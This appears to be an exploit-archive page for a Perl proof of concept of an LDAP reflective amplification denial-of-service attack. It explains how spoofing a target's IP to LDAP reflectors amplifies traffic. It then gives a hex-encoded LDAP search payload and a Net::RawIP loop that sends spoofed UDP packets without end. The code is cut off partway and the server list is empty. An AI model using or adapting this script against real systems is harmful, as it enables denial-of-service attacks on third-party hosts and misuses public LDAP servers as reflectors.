LDAP Amplication Denial Of Service

This proof of concept is an LDAP Distributed Reflective Denial of Service/Bandwidth Amplification Attack, similar to DNS and NTP amplification attacks where the target of the DoS is spoofed as the source IP in a request to the reflectors(In this case, LDAP servers). The reflectors then respond to the spoofed target IP with a bigger answer than the original question, resulting in the target experiencing what appears to be a distributed denial of service attack, even though there may only be one true source. suffers from a denial of service vulnerability.

MD5 | 3c0c963c42fa117bd2ae19bab9220098

# by ShadowHatesYou
use Net::RawIP;
@ldapservers = qw(

if ($ARGV[0] eq '') { print "Use: $0 <IP>\n"; exit; }
my $target = "$ARGV[0]";
my $ldap_searchrequest = "\x30\x84\x00\x00\x00\x2d\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00";
my $sock = new Net::RawIP({udp=>{}});
while () {
for (my $i=0; $i < @ldapservers; $i++) {
$sock->set({ip => {saddr => $target, daddr => $ldapservers[$i]},udp => {source => 389,dest => 389, data=>$ldap_searchrequest} });

Related Posts